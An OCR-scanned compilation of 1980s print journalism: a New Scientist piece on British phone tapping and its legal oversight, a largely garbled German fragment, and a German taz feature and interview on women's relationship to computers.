phone is bugged. UsuaUy it is not. 
Clicks and crackles on the line can be 
caused by dirty contacts at the local 
exchange, or a crossed line. British Telecom 
has never pretended that the telephone is a 
secure instrument. A friend of mine once 
got a crossed line into Buckingham Palace. 

In September 1974, when I was writing 
an article about letter bombs, 1 talked by 
phone with an editor äbout a potentially 
explosive weedkiller on open sale at,my 
local Boots. Two hours later, the hrainch 
manager got a phone call from his head 
Office telling him to remove it at once. 
Coinddence? Who cares. If tapping my 
phone helped the police to stop the 
bombers, more power to their plugs. What 
grates, however, is the hypocrisy. 

In 1985, after a slap-down by the Euro¬ 
pean Court of Human Rights, the British 
govemment gave some figures on official 
phone taps. Düring 1984, the Home 
Secretary authorised 352 taps, the Foreign 
Secretary 115 and the Secretary of State for 
Scotland 71. Heaven knows how many 
lines were being tapped without anyone’s 
knowledge. 

The Interception of Communications 
Act 1985 came into force last April with the 
promise of curbing such abuses. It merely 
confirms that only a secretary of state, 
usually in the Home Office, can authorise a 
tap to prevent crime, benefit national Secu¬ 
rity or safeguard the economic wellbeing of 
the countiy. Anyone eise gets a £2000 fine, 
two years in jail or both—provided they are 
cau^t and brought to book. 

A panel of independent lawyers, sitting 
as the Interception of Communications 
Tribunal, investigates complaints. The ► 


► govemment now refuses to give figures 
on even official tapping and the tribunal 
says it has not yet decided which complaint 
statistics to release, or when or how, or even 
i/it will release them. After 10 April this 
year, the tribunal will no longer be able to 
use the current excuse that it has not yet 
been in business for a full year. 

If the tribunal finds that a tap has been 
properly authorised it simply teils the 
complainant that “There has been no 
contravention of the Act.” It says the same 
thing if no tap is found. So the complainant 
gets the same answer under two, radically 
different, drcumstances—^and has no idea 
how and where the tribunal looked. 

Experts in paranoia will teil you how 
lines can be tapped by clever technical 
tricks. The fadlity TKO (TrunK Offering) 
can tag trunk calls with an inaudible code 
and break into an existing Connection. But 
the easy way is at a local exchange. Essen- 
tially, all it needs is an extra pair of wires 
connected between the subscriber’s line 
and a telephone earpiece or tape recorder. 

The Connection is made by engineers at 
the exchange, working in a reservcd area to 
which most employees of British Telecom 
have no access. The tapped subscriber 
is unlikely to know, until something 
happens—such as weedkiller disappearing 
from a shop shelf. 

The main bar to tapping is time. 
Twenty years ago, the Hollywood film The 
PresidenTs Analyst neatly summed up the 
Problem. It conjured up the vision of a 
United States in which every phone was 
tapped, with only robots left with the time 
to listen. Modem technology offers a solu- 
tion similar to this. Speech-recognition 
circuitry listens for key words or 
accents—such as the word “bomb” in an 

CAN YOO SPfAK* 

uf iVEqoT fi n 

feflO TAP 


M. tr hr i cht Mr . : ,'v 

Mfiicliricht-. vonr, l'M 11 -I-IMKLM; 
bcd r-t (■ (+■: 
f itTCies.di 1(11; Hin: 

l ruf.' l' : 

I c .; l.: 


VM'.;! bif-.U-l- I Mf MHEhl Zi.lM KAÜIiL 
ULU'. 




Aui.M uf'iMn c-ju:m i.ahel- rrjü'iytutN rxNANiiiEKEN 

(itr:? iic'nL'-cl'iC! linndr-'-.p,:..-, f in .’.t,t3.Ti«i(ii<?ri.7»r-bci t. mit ZDF 

.Ml UcMiliCMotulf’. nacrli Dt + i n i el ) t?n AnqitbM’n ries Z!>F , 

d'itih rliri "Wi irf-t.-li I t 1 in" - i nn 733575 Anr-u-f»? t?r ha 11 tsn, d.h. 


Dl-I 


uif?nc'r(i(tu?n - 


l.t; 'r 1 . c-1 l 1 (-• lii.M-iM iri, rjTtf5.E5 di»? gHPchftl Lf?i F.ungen 

nichi ^iU53rni chtE-n und diese? daher am naechsten Wochenende, 
natuor :i i c:h nur* rum Beriten der Zuschauer, vc?rdappel t wereJesn. 


Wipi limr ini t. -- 
Nr,. IJ.'chri rht. 


von: h’. lli:iNWE.CKt; cuns Ul—07-BA. 


l'-:; i int -f i m nr (f'nd ^ n<? dr(?i vi or te.l Ni I 1 i on Zumchisuer 

oni , cjurcli citirnti? bei ni d i t-y 1-c'S'F qewj nn versprechenden 

Ihh-l TMiifJuli.'r Fjni'^t^hei rjend ,nu+ das Programm Ein-fluss 

nr'liMir-i i r u Foonrif'-n . 

rnr-u i ‘d qiil ( nnr din !-i n-mr i nrt.tng ;!ul;uer-ift j ge- KcibPlplAPne 

erb j(^rDrhäl t V libff -liUS l’KjhfiNöbbl ne tz er. dt.irch die geplanten l^onifriorc i p j ] i.-.n 


Irish brogue—and then switches on a tape 
recorder. But someone somewhere still has 
to listen to the tapes. 

Recently, Llin Golding, the MP for 
Newcastle under Lyme, had good reason to 
fear that her phone was tapped. The phone 
rang and her office heard someone at the 
other end talking about “going off duty”. 
Later, the phone replayed a conversation 
she had had previously. It is unlikely that 
this was the result of an official tap. The last 
thing a Professional eave^ropper wants to 
do is to inject damning signads back down 
the line, whether from a microphone or 
tape recorder. 

Any business can quite legally buy or hire 
equipment to log telephone calls, such as a 
device called Tiger. This prints out a record 
of every call made through the Company 
switchboard. Primarily intended to deter 
Office Staff from phoning their friends long 
distance, the System can also nail leaks 
of industrial Information. When one 
Northern university installed a Tiger, 
sevcral laboratory researchers had to buy 
wristwatches. They had previously relied 
on the speaking clpck. 

Employees of British Telecom are bound 
by the Official Secrets Act and the Tele- 
communications Act. Few would dare to 
tilg an unauthorised tap. But if a Company 
boss wants to behave like an inquisitive 
switchboard operator, and listen into staff 
phone calls, then there is probably no legal 
bar—just as the law cannot prevent a father 
from picking up the extension phone and 
monitoring a child’s call. 

Brokers in the City are currently wonder- 
ing how investigators may have coUcctcd 
evidence of insider trading. To net one 
incriminating conversation, it may 
necessary to eavesdrop on many. Others in 
the City are wondering what they may have 
said on the telephone while British Tele¬ 
com was investigating a possible fraud 
involving the billing of foreign calls. 

TTie future will feed paranoia. There are 
around 6000 telephone exchanges in 
Britain. Until recently, all used primitive 
mechanical relays to switch analogue 
Signals. Now, every working day British 
Telecom converts another of these 
exchanges to System X or similar digital 
technology. There are already more than 
300 digital exchanges with solid-state 
Switching, designed to create Conference 
calls, re-route Imes and log numbers. The 
origin and destination of any call can be 
displayed on a Computer screen. 

This is good news for the police, who will 
be able to trace a kidnap call within 
seconds. It is also good news for authorised 
tappers. The tappers’ extra Connections are 
inaudible, and even harder to detect than 
previously. 

But there will still remain one sure way of 
finding out whether a phoiie is tapi^d. Just 
put a simple fault on the line, for instance 
by disconnecting a wire, and call BT’s 
engineers using another phone. If they 
arrive within minutes rather than days, be 
on your guard. If someone really is tapping 
your phone, they’ll want to get it working 
again quickly. □ 


rogrAm 


Al 


cd: H(:'+-i l 1 ;i ch ncM:!"' Wun?;r;h f j 1 «.c* und Hi Uparaden? 


Nsvv Sdentlst 26 Fabruary 1987 


cj j 1»t ' ‘=1 ri i 


lii WAhion 


\ ^ / 







Computer 

- ein alter Herrenhut 

Sich auskennen mit Computern ist eine Altersfrage, 
ebenso ist es eine geschlechtsspezifische Frage 
Computerheimarbeit / Computerlehrgang / Computerbuch 


Von Maria Neef-Uthoff 


ln einer Talkshow wurde die neue 
Bildungsministerin von Schles¬ 
wig-Holstein, Eva Rühmkorf 
(SPD), gefragt, was sie denn au¬ 
ßerhalb ihrer Regierungsge¬ 
schäfte noch machen würde. Sie 
antwortete,, sie werde sich mit 
Computern beschäftigen, das sei 
ein Gebiet, das ihr bisher ver¬ 
schlossen geblieben sei. Obwohl 
sie Frauen immer ermutigt hätte, 
sich mit High Tech anzufreunden. 
Und der sozialdemokratische Re¬ 
gierungschef Björn Engholm ver¬ 
kündete auf der Hanno ver-Messe, 
daß er nach der Wahl Cornpumr- 
praktikant werden wolle. Nicht 
nur mittelalterliche Politiker ent¬ 
decken plötzlich, daß sie mit der 
Zeit nicht Schritt gehalten haben, 
auch unsereins macht diese herbe 
Entdeckung. 

Mit sechs Männern und tunt 
Frauen lernen wir auf einem „nor¬ 
malen PC“. Ein „PC“ ist ein Per¬ 
sonal-Computer, mit dem man 
„anständig “arbeitenkann, imGe- 
gensatzzudenHome-Computern, 
die kleiner sind, was die Kapazität 
angeht. Die Leute sind zwischen 
25 und 45, die Frauen arbeitslos, 
die Männer kleinere und mittlere 
Meister und Angestellte. 

FünfTagelanglernenwir etwas 

über IHN. ER kennt nur richtig 
oder falsch. Macht man was 
falsch, rattert und piepst es, und 

aufdemBildschirmweistERmich 

streng zurecht; „UnzulässigerBe- 
fehl. “ Das schüchtert mich ein. 


ER hört andererseits nur auf 
„Befehle“, „stirbt“, wenn der 
„Saft“ fehlt und ist in der Lage, auf 
Befehl „ sich etwas zu holen“. ER 
ist hochempfindlich und verträgt 
keine Wärme wie die männlichen 
Hoden. „Byte“ ist das Wort für 
Zeichen, und die Anzahl zeigt die 
Kapazität des „Speichers an. 
„Programme“ sind Anweisun¬ 
gen. Eine Anweisung ist das zur 
Zeit gebräuchliche Betriebssy¬ 
stem MS-DOS, das von einer Dis¬ 
kette in den Computer reingetan 
wird, damit er überhaupt was tut. 
„BASIC“ ist eine Programmier¬ 
sprache für Anfänger. „LOGO“ 
ist die einfachste Sprache, die 
auch ein Home-Computer ver¬ 
steht. Die Computersprache te- 
steht meist aus einsilbigen Wör¬ 
tern, so fremd wie Science-fic¬ 
tion. ER versteht mich nur, wenn 
ich das Richtige zur rechten Zeit 
mache. Wenn ich etwas drücke, 
was nicht ins Programm paßt, 
macht ER nicht mit. ER ignoriert 
mich. W ijr lernen eine Menge über 

„Disketten“, was „formatieren“ 

ist (die Diskette so herzurichten, 
daß sie speichern kann), und dann 
machen wir ein Ubungspro- 
gratnm. „Das hast du sehr gut ge¬ 
macht, Maria“, lobt mich der gute 
PC. Oh, was fühle ich mich gut. 
Wie eindeutig ER doch ist, unbe- 

stechlichundwahrhaftig,total ob¬ 
jektiv! 

Ganz so wie Claus Eurich es be¬ 


zogen auf die Computerkinder’ 
kritisch beschreibt, man erMre 
Reaktionen nur vom apparativen 
Gegenüber, die Reaktion des 
Computers erscheine einem nicht 
subjektiv verzerrt. „Die Eindeu¬ 
tigkeit der Computerlogik, die 
Unbarmherzigkeit gegenüber 
Fehlern lassen den Rechner 
schnell zum Maßstab für Unbe¬ 
stechlichkeit und Wahrheit 
werden.“ 

Ach, lassen wir diesen Nörgler, 
just an dieser Stelle befällt mich 
ein zartes Gefühl von Liebe für den 
Rechner. 

Wie schön es sein muß, immer 
wieder gelobt zu werden. Eifrig 
übe ich mit meinem Übungspro¬ 
gramm weiter.. Alle Kursteilneh¬ 
mer sind guter Dinge. Wie beein¬ 
flußbar wir sind, wie hörig dem 
geschriebenen Wort gegenüber, 
dem Gerät, das unsere Namen 
kennt. Es ist alles ziemlich ein¬ 
fach . Ein Apparat, der mit mir re¬ 
det, fordert mich zu Höchstlei¬ 
stungen heraus. Irgendwas hat er, 
und nachder Angst vor ihm kommt 
jetzt wie bei einem ordentlichen 
Therapeuten die Übertragung und 

die Verliebtheit. 

Manchmal aber sind Punkte 
wichtig. Manchmal Doppel¬ 
punkte, ER diszipliniert mich. 
Ohne Punkt tut ER nichts, auch 
wenn ich noch so oft den richtigen 
Befehl eintippe. ER tut auch 


nichts, wenn ich einen Tippfehler 
mache, nein, ER zwingt mich, or¬ 
dentlich und sorgfältig zu sein. So 
lerne ich sogar endlich fehlerfrei 
Schreibmaschine zu schreiben! 

„Guten Morgen, Maria“, sagt 
der Computer am nächsten Tag. 
Liebevoll streichle ich seine zar¬ 
ten Tasten. Man braucht sie nur 

ganz leicht zu berühren, das hat er 
sehr gerne. Über die bösen Men¬ 
schen, die Computer-Viren her¬ 
steilen, lernen wir auch etwas, 
Computer-Viren sind Pro¬ 
gramme, die andere Programme 
stören, 

„Huch, was ist das, es geht 
nicht“, ruft Roland. „Wer stellt 
die Software her“, fragt Silke, 

Die Frauen stellen die grund¬ 
sätzlicheren Fragen, die Männer 
fragen nieetwas.Und wenn unser 
Computerlehrer die Antwort gibt 
hört man aus sechs Kehlen tiefes' 
zustimmendes Brununen und 
Brubbeln, und die letzten Worte 
werden verständnissinnig nach¬ 
gesagt. Dabei tun sie sich' so 
schwer mit der Anwendung, sie 
vertippen sich andauernd, wäh¬ 
rend meine N achbarin es blind wie 
mit links macht. 

Der amerikanische Computer¬ 
wissenschaftler Joseph Weizen 
bäum berichtet in seinem Buch 
„Die Macht der Computer und die 
Ohnmacht der Vernunft“, daß 
aus einem Sprachanaly'senpro'^ 
gramm „Eliza“ ein Therapiepr^ 



gramm namens „Doctor“ entwik- 
kelt hat. Viele praktizierende 
Psychiater waren begeistert. Wei¬ 
zenbaum stellte bestürzt fest, wie 
schnell und wie intensiv Perso¬ 
nen, die sich mit „Doctor“ unter¬ 
hielten, eine emotionale Bezie¬ 
hung zum Computer entwickel¬ 
ten. Deutlich wird aber auch das 
erschreckend Defizitäre in der 
menschlichen Kommunikation 
und die Gläubigkeit an die Ma¬ 
schine, nicht in ihrer üblichen 
Funktion als Verlängerung, son¬ 
dern als besserer Ersatz. 

Frauenmhen 

Wer ist Ada Gräfin von Lovelace? 
Gelebt hat sie von 1815 bis 1852, 
und sie hat einen französischen 
Artikel ins Englische übersetzt. 
Dazu hat sie umfangreiche An¬ 
merkungen verfaßt. Inhalt ihrer 
Übersetzungsarbeit war das Kon¬ 
zept einer „analytischen Ma¬ 
schine“ eines Herrn Charles Bab- 
bage, einFraiizose. Die Maschine 
vvar eine Rechenmaschine. Und 
Gräfin von Lovelace hat diese Re¬ 
chenmaschine nicht nur beschrie¬ 
ben, sie hat sie auch benutzt und 
sich Gedanken darüber gemacht. 
Ihre „Anmerkungen“ sind näm¬ 
lich nichts anderes als detaillierte 
Beschreibungen für die Benut¬ 
zung der Maschine. Ein frühes er- 



stesJHandbuch zur Gomputerpro- 
grammierung hat sie geschrieben. 
Zum Beispiel diskutiert sie in ih¬ 
ren „Anmerkungen“ die Anwen¬ 
dung von Computern für musika¬ 
lische Kompositionen. Ihre Bio¬ 
grafie ist schillernd und nicht bis 
ins Letzte hinein ergründbar. 

Immerhin hat sie sich um die 
„Software“ verdient gemacht, 
also um denjenigen Teil der Com¬ 
putertechnik, der nicht .wfe die 
„Hardware“ anfaßhar ist, dem At¬ 
mosphärischen eben, also auch 
dem traditionell Weiblichen. 

In einer Sammlung von Vorträ¬ 
gen und Berichten zur Tagung 
„Naturwissenschaften und Tech¬ 
nik — doch Fräuensache“ (1986) 
fragt sich eine Arbeitsgruppe, wie 
frau denn am besten an Computer 
gewöhnt werden könnte. Und sie 
kommen darauf, daß Frauen sich 
gern mit Textilien beschäftigen. 
Frauen, die in einer Arbeits¬ 
gruppe stricken, wollen was 
„Konkretes schaffen“. Frauen 
lieben es, an Volkshochschulen 
Textilkurse zu belegen, das seien 
für Frauen bekannte Bereiche. 
Und jetzt kommen die schlauen 
Frauen auf die Idee, die Compu¬ 
tertechnik über Musterweberei an 
die Frau zu bringen. Weil viele 
Frauen eine Affinität zum Weben 
hätten und weil hier zwei Fliegen 
mit einer Klappe erwischt wür¬ 
den, nämlich die Nähe der Webe¬ 
rei zur Frauenarbeitsgeschichte 
und die Auflösung der „typisch 
weiblichen Technophobic“. 

„In der Arbeitsgnippendiskus- 
sion wurde besonders von den In- 
formatikerinnen herausgestellt, 
daß es sich bei der Entwicklung 
der Musterpatrone um einen Pro¬ 
grammiervorgang handelt, daß 
von hier aus deshalb ein Zugang 
zur Software des Computers mög¬ 
lich ist.“ Also, für wie blöd halten 
sie die Frauen eigentlich? Soll mir 
klammheimlich und hintenrum 
eine Technik beigeb rächt werden, 
die sowieso schon längst meinen 
Arbeitsplatz ausmacht? Sekretä¬ 
rinnen sind Spezialistinnen am 
Computer, ohne es zu wissen, sagt 


die Autorin von „GO STOP 
RUN“, dem ersten Computer¬ 
lehrbuch für Frauen, Deborah L. 
Brecker. 

Aber wie sehr sind Frauen ei- 
gendich von der Computerisic- 
rung betroffen? Spielen tun Mäd¬ 
chen so gut wie überhaupt nicht 
damit. In Computercamps findet 
man schlaue kleine Jungs, aber 
fast keine schlauen kleinen Mäd¬ 
chen. Das, was früher ge- 
schlechtsspezifische Spiele wa¬ 
ren, streng nach lungen und Mäd¬ 
chen eingeteilt, findet jetzt in der 
Computerwelt ihren Nieder¬ 
schlag, sie bleiben den Mädchen 
verschlossen. Da Mädchen vor¬ 
wiegend mit Mädchen spielen, 
fehlt derNachahmungseffekt. Sie 
kennen keine, dieeinen Computer 
zu Hause hat, auch Mutter hat bis¬ 
lang keinen. In der Klasse meiner 
Tochter haben von elf Jungen acht 
einen Computer zu Hause, von 
den 14 Mädchen hat keine einen. 
So hat sich hintenrum wieder ein¬ 
mal eine geschlechtsspezifische 
Aufteilung des Tuns, Könnens 
und Wissens ergeben, eines Wis¬ 
sens, das einen erheblichen Vor¬ 
sprung ermöglicht. 

Computer, soll man sie nun ver¬ 
teufeln, soll man sie akzeptieren? 
Ist es eine Technikverweigerung, 
dieFraüen spitzeFinger am Com¬ 
puter machen läßt? Oder ist es nur 
die Folge des Grundsatzes, den je¬ 
des Mädchen gelernt hat: Mäd¬ 
chen verstehen nichts von 
Technik? 

Bekannte Strukturen 

Eine Untersuchung von 1986 
zeigt, daß im Banken- und Versi¬ 
cherungsbereich sechs Prozent 
der Arbeitnehmerinnen Compu¬ 
ter benutzen. In der öffentlichen 
Verwaltungund im Handel sind es 
zirka20bis25 Prozent, und insge¬ 
samt setzen 14 Prozent Computer 
als Hilfsmittel für ihre Arbeit ein. 
Eine Brigitte-Studie hat im Jahre 
1987 die Einstellung zum Compu¬ 
ter erfragt, und dabei kam heraus, 
daß 87 Prozent der befragten 
Frauen die Computerentwicklung 


kritischer als die befragten Män¬ 
ner sehen. Sie haben Angst, daß 
sich der Kontakt mit den Kollegen 
verringern könnte, daß Arbeits¬ 
plätze vernichtet werden könnten. 
Es gibt Gesundheitsbelastungen 
und es gibt die Kontrolle durch den 
Computer. Wie oft Frauen von ih- 
reni Computerarbeitsplatz Weg¬ 
gehen, wie oft sie telefonieren, 
was sie für Nummern anwählen, 
all das kann der Computer für den 
Arbeitgeber ermitteln. Akkord¬ 
höchstleistung kann er durch ge¬ 
zielte Disziplinierungen erzwin¬ 
gen. Dennoch: Die prinzipielle 
Anwendung steht nicht mehr zur 
Disposition. 

Wie aber nimmt ffau Einfluß 
auf die Entwicklung, Gestaltung 
und Anwendung neuer Technolo¬ 
gien? Frauenspezifische Compu¬ 
ter? Das ist so albern wie der Ver¬ 
such, Frauen den Computer über 
das Textile nahezubringen. Den 
Mädchen ist das oft einfach zu 
blöde, ein kleines Männchen auf 
dem Bildschirm hin- und herflit¬ 
zen zu lassen. Inzwischen werden 
Schnupperkurse für Mädchen an¬ 
geboren, auch von Gewerk¬ 
schaftsseite wird vorsichtig Wei¬ 
terbildung betrieben. Es ist wie 
übcrallmitderMacht: Wiederein¬ 
mal sollen Frauen, ümsiezuerrei- 
chen, sich etwas zu eigen machen, 
das dem män'nlichen Geist, der 
männlichen Herangehensweise 
entspricht. Die Struktur ist männ¬ 
lich, und Frauen haben sich anzu- 
.passen. Sie müssen lernen, und 
das geht nicht über die Nischen 
und über die Verweigerung. Was 
für eine Vielfachbelastung! 

Heimarbeit 

Die Computerheimarbeit ist wei¬ 
ter verbreitet als viele ahnen. In 
der Druckindustrie sind es mehr 
.als 2.000 Frauen, die zu Hause am 
Computer arbeiten. Die Frauen, 
so ermittelte eine Sozialfor¬ 
schungsgruppe in Dortmund, ar¬ 
beiten als Selbständige. Sie be¬ 
kommen einen Werkvertrag, sie 
garantieren dem Betrieb eine mo¬ 
natliche Leistung, z.B. eine Mil- 


geht den Damen 
ein Licht auf? 



lion Anschläge. In Flautezelten ist rn( 
das ganz übel, weil es dann keine eii 
Verträge gibt. 

30 Frauen und 25 Männer wur- 
den für einen Forschungsbericht 
zur Computerheimarbeit befragt, 
den das Deutsche Jugendinstimt qt 
München (DJI) im vergangenen ^ 
Jahr veröffentlicht hat. Danach ei 
sind die Computerheimarbeite- b; 
rinnen sehr zufrieden. Auf die ^ 
Frage, ob sie eine Arbeit außer d: 
Hause vorzögen, antwortete die G 
Mehrheirmit Nein. Obwohl es zu F 
Streß und Problemen kommt, b 
VieleFrauenarbeitenjageradezu v 
Hause, weil sie Familienarbeit " 
miteinbeziehen. Esstelltsichdann ü 
schnell heraus, daßdie Kinder stö¬ 
ren. Dann wird nachts gearbeitet j 

oder streng zu den Zeiten, wo die ^ 

Gören außer Haus sind. Das Zu- , 
hausesein empfinden infolgedes- j 
sen viele der Frauen als ambiva- ^ 
lent. So sehr ist keine daran ge- ] 

wohnt sich abzugrenzen, und sich , 
ganz diszipliniert die Zeit einzu¬ 
teilen. Auch wenn ein Drittel der 
Frauen sich Putzhilfen leistet, ist 
immer noch genug im Haus zu tun. 
Frauen ünd Männer haben bei 
ComputerheimarbeitwenigerGe- 
legenheit, Freunde zu sehen und 
Freizeitgestaltung zu betreiben. 
Bei den Frauen liegt es am zerris¬ 
senen Tag, und bei eiligen Aufträ¬ 
gen, die nicht vorhersehbar sind, 
bei den Männern aber auch unter 
Umständen an der Computerfas¬ 
zination. Ein Problem zwanghaft 
lösen zu wollen, auch wenn es die 
Gesundheit kostet. Männer in der 
Familie stellen andererseits fest, 
daß sie durch die Computerheim¬ 
arbeit zwangsläufig mehr mit ih¬ 
ren häuslichen Lieben zu tun 
haben. 

Die große Zufriedenheit der 
Computerheimarbeiterinnen 
kommt daher, daß der Computer 
als eine Herausforderung begrif¬ 
fen wird, die Computerheimar¬ 
beit als eine herausfordernde Tä¬ 
tigkeit, deren Erfüllung Selbstbe¬ 
wußtsein hervorruft. Die Frauen 
kommen aus traditionellen Büro- 
und Angestelltenbereichen, und 
die Heimarbeit kann „als Protest 
der Frauen gegen die hierarchi¬ 
schen Strukturen der Betriebe in¬ 
terpretiert werden“ (DJI). 63 Pro¬ 
zent der Frauen waren vorher 
erwerbstätig, 25 Prozent waren 
arbeitslos, und-13 Prozent waren 
Hausfrauen. Frauen seien mit der 
Büroorganisationund Computern 
bestens vertraut, wogegen Mana¬ 
gern eher eine Computerangst 
nachgesagt wird. Wegen dem ho¬ 
hen „Potential weiblicherKompe- 
tenzen“ sollten Frauen danach 

trachten, höherQualifizierteCom- 
putertätigkeiten auszuüben. Bei¬ 
spielsweise die Beratung von Fir¬ 


men, die neue Computersysteme ■, 
einführen wollen oder die Bera- | 
tung bei Softwareveränderungen 
für spezielle Systeme »Tätigkeiten 
und Funktionen. 


Diese Arbeiten, die als höher¬ 
qualifiziert gelten, und die unter 
Umständen ziemlich viel Geld 
einbringen, werden zur Zeit 
hauptsächlich von Männern ge¬ 
macht, So fängt auch der Ver¬ 
dienst der Männer genau an der 
Grenze an, wo der zur Zeit für 
Frauen aufhört. Frauen geben an, 
bis zu 2.000 Mark bei Vollzeit zu 
verdienen, Männer machen esj 

nicht darunter, eher aber weit dar¬ 
über,nämlichbiszu 10.000Mark. 

DabeikönntederComputerden 
Frauen weit mehr bieten. Steht er 
einmal in der Wohnung, fordert er 
geradezu heraus, sich mit ihm zu 
beschäftigen. Austüfteln, Aus- 
ptobieren. Lernen. Die Möglich¬ 
keiten , sich weiterzuqualifizieren 
ohne Ausbildungsnachweise und 
Zertifikate, sind in dieser „Nische 
auf dem Arbeitsmarkt“ noch ge¬ 
geben. 

Höherqualifizieren? 

Frauen haben einen weiblichen | 
Lemstil, behauptet die AulPDA 
desersten Frauencomputer-Lehr- ' 
buchs Deborah L. Brecher (siehe 
auch Interview). Frauen lernen 
eherganzheitlich, wieetwasfunk- 
tioniertundwarum. DerMannda- 

■ gegen drückt auf die Tasten und 
wartet was passiert. Während 

! Frauen das Ganze verstehen wol- 

■ len, reicht es Männern, erst mal 
' auszuprobieren, und nach und 

■ nachzuverstehenoderauchnicht. 

- Grund ist die Regelorientiertheit 
^ der Jungenspiele (Handball) im 

Gegensatz zu den Mädchenspie- 
r len, die prozessorientiert seien. 
Außerdem fehlt Frauen im allge- 

r YneinendicErfahrungmit&hemn- 

- Zeichnungen. Sie haben in ihrer 

•- ViMheit nie Flugzeugmodellezu- 
i- sammenbauen müssen. In Sachen 

J- Chaosproduktion sind Frauen. 
n aufgrund ihrer Verantwortlich- 
>- keit im häuslichen Bereich auch 
id vorsichtiger. Deswegen experi- 
st mentieren sie vorsichtiger. Die 
i- sprichwörtliche Zaghaftigkeit 

1- vonFrauenhatalsoeinensehrklu- 

3- gen Hintergrund. 

5r 

;n Im Lehrbuch von Brecher ist 
:n das alles berücksichtigt. Fachaus- 
er drücke werden erklärt. Sie nimmt 
m Analogien und Beispiele aus dem 
a- Umkreis der weiblichen Erfah- 
;st rungen (z.B. vergleicht sie man- 
0 - ches mit dem Backen, was einem 
e- vielleicht etwas komisch vor- 
ch kommt, aber es sogleich auch ver- 

n- ständlicher macht). 



Ziel istdie Auflösung von Tech- müssen. 


nophobiehinzurmutigenQualifi- t 

kation. Denn wer bestimmt heute 
dieBeschäftigungspolitikimtech- 
nischen Bereich? Wer bestimmt, 
wie und welche Computer einge¬ 
setzt werden? Und wer hat dann , 
die Last mit der Anwendung? Die 
Propaganda kommt einem ein biß- i 
eben naiv vor, wenn man bedenkt, 1 
wie hoch das Interesse gerade an 
niedrigen Arbeiten am Computer ‘ 
ist. Bei einerUmverteilung der ge- 
schlechtsspezifischen Computer¬ 
arbeit, müßten die Männer man¬ 
gels besserer Angebote eben auch 
„niedere“ Arbeiten venichten. Es 
wäre sowieso besser, wenn sie es 
täten, dennsiewerdenbekanntlich 
1 nicht schwanger. In Kalifornien 
hat man festgestellt, daß Frauen, 
die mehr als 20 Stunden i n der W o- 
che am Bildschirm arbeiten, dop¬ 
pelt so oft Fehlgeburten haben wie 
andere Frauen. Ein Gespräch: A. 
meint, Kinder an Computern vriir- 
den kein prozessuales Denken 
mehr lernen, keine Zufalle beim 
Spiel, cs würde im Grunde eine 
Verarmung stattfinden, das Pro¬ 
zeßhafte imLcbenund imspieleri¬ 
schen Erfahren des Lebens völlig 
I verschwinden. Aber die Kinder, 
die Computer spielen, gucken sel- 
t tener Glotze, halte ich dagegen. 

1 Sie probieren, sie spielen Abcn- 
teuerspiele, in denen sie die 
Hauptrollehaben, siekämpfenge- 
, gen eine „objektive Macht“, den 
. I Computer, an, schluBendlich ge- 
j winnt der, aber sie haben den Er- 

’ folg des Absurden. DerComputer 
1 stelltihnenAufgaben,diesielösen 


Durch den Computer werden 
sie herausgefordert, und sie wis¬ 
sen, daß es eine Maschine ist. 
Einsame Kinder, was hätten sic 
sonst heuuutage. Ich hatte Steck- 
bausteine,da versuchte ich, Kauf¬ 
läden und Puppenstuben draus zu 
basteln. Es ist mir nie gelungen, 
und hat in mir die tiefe Überzeu¬ 
gung himerlassen, daß, je mehr 
ich mich anstrenge, etwas zu lej. 
sten, umso weniger dabei heraus¬ 
kommt , undeben Aufgebautes im¬ 
mer wieder zusammcnkracht. 
Nicht so das Computerkind. Zu¬ 
nächst tut der Computer immer 
das, was man sagt. Er mt auch d^ 
was man will, vorausgesetzt, be¬ 
stimmte Regeln werden eingehal¬ 
ten. Beim Steckbaukasten ist die 
Zerstörungsgefahr viel größer 
Obwohl man strikt die Regeln ein¬ 
hält (die Steine ineinandersteckt) 

ist noch längst nicht gesagt, daß 
das dabei herauskommt, was man 
sich vorgenommen hat. Beim 
Computer geht’s, oder es geht 

nicht,undwennesnichtgeht, iste^ 

nicht so schlimm, weil es ja eine 
Maschine ist. Ein Ding, von dem 
man immer wußte, daß man ihm 
eigenüich nicht gewachsen ist 
Die Bausteine dagegen sind viel 
verletzlicher, roher, man ist viel 
zu sehr mit ihnen identifiziert 

Dieses Männerspielzeug, des 
sen einziges Geheimnis ein’„Ge' 

1 him“ ist, das zusammenz^e' 

und vergleichen kann, das sich dä 

monisch aufblähen läßt, weil ' 

mitihmDingetunkann.’diema^ 

! der Geschwindigkeit n^Ss 



























N T E R V I E W 


Ein Computerbuch für einen weiblichen Lernstil 

Deborah L Brecher, Autorin von „GO STOP RUN“ plädiert für das Verständnis der Technologlesprache 


taz: Ein Computerbuch flir einen weiblichen Lem- 
stil. Wendest Du mit dem Schlagwortder „Ganzheü- 
Uchkeit“ beim Lemennicld ein Defizit von Frauen in 
einPositivumum? 

Deborah L. Brecher: Ich denke nicht,daßeseinDe- 
fizit ist. ZumBeispiel müssen alle Kinderdas Schrei¬ 
ben mit der rechten Hand erlernen, selbst wenn sie 
linkshändig sind, was nicht gut für sie ist. Ich denke, 
das ist dasselbe. Frauen werden gerade im techni¬ 
schen Bereich mit einem Lemstil, näml ichdemnach 
Regeln konfrontiert, der nicht der ihre ist, und wen¬ 
den sich deshalb von der Materie ab. 

Die negativen Auswirkungen des Computerein¬ 
satzes auf Frauenarbeitsplätzen sind bekannt. Wo 
siehst Du die Chancen für Frauen ? 

Für mich ist die große Frage, wie die Technologie 
umgesetzt wird. Eigentlich sollten Computer die 
Wirkung haben, daß die Arbeit erleichtert wird. So 
ist es aber gewöhnlich nicht. Das heißt für mich, daß 
die Anwendung von Computern falsch ist. Es liegt 
nicht an der Technologie selbst, sondern daran, wie 
sie umgesetzt wird. Z.B. wenn wir Technologie 
richtig benutzen würden, da würde es dann irgend¬ 
wann keine „Tippsen“ mehr geben. Irgendwann 
müßte die Trennung der Arbeitsberichte, daß die 
eine tippt, was die andere sich ausgedacht hat, aufge¬ 
hoben werden. Diese Trennung ist absurd, zumal 
jetzt schon kleine Jungen am Computer tippen ler¬ 
nen. Dieser Teil der Arbeit muß rückintegriert wer¬ 
den in dieganze Arbeit von schriftlicher Produktion, 
wodurch sich für Frauen andere, interessantere Tä¬ 
tigkeiten erschließen könnten, als das Tippen von 
Gedanken anderer. 

Die Amerikaner haben sich in Schweden umge- 
gucktundgesehen,daßsiedortbessereAutosprodu- 
zieren, weil die Leute dort in Teams arbeiten und das 
Endprodukt, was sie selber hergestellt haben, als 
Ganzes sehen. Die Amerikaner haben einerseits da¬ 
von gelernt, andererseits stellen sie jetzt Computer 
